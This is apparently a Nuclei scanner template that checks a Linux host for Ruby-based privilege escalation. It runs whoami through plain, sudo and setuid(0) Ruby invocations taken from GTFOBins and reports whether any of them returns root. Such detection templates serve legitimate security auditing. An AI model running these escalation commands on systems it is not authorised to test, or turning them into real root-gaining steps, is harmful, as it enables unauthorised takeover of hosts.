Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
PoC代码[已公开]
id: privesc-ruby
info:
name: Ruby - Privilege Escalation
author: daffainfo
severity: high
description: |
Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects.
reference:
- https://gtfobins.github.io/gtfobins/ruby/
metadata:
verified: true
max-request: 4
tags: code,linux,ruby,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
ruby -e 'exec "whoami"'
- engine:
- sh
- bash
source: |
sudo ruby -e 'exec "whoami"'
- engine:
- sh
- bash
source: |
ruby -e 'Process::Sys.setuid(0); exec "whoami"'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
# digest: 4b0a00483046022100b9f79d11ae5568d5ecb0c7adee8e6de79c466c14939822f8da6e6f746ed0e7b80221008eb6f82031339d0ea5eb0a0dc45769a03565f68da6d4dd8b95dd47573453e8a8:922c64590222798bb761d5b6d8e72950